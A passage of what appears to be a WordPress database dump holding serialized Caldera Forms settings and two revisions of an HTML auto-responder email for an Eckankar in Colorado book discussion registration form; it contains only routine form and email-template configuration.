\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:16:\"<p>{summary}</p>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8505:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 18px; font-family: Open Sans; font-weight: 600; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 40px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 16px; color: #4c4747; line-height: 33px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %firstname%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us. We will only use your information to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 0px 30px; height: 25px;\" bgcolor=\"#EBEBEB\" align=\"left\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"center\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"color: #4c4747; font-size: 17px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request on the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"color: #4c4747; font-size: 16px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 16px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(31,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Tue, 27 Apr 2021 18:02:40 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:140:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>									\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:16:\"<p>{summary}</p>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8708:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 18px; font-family: Open Sans; font-weight: 600; color: #4c4747; text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello <strong>%first_name%!</strong></p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us. We will only use your information to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 25px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"color: #4c4747; font-size: 17px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"color: #4c4747; font-size: 16px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" 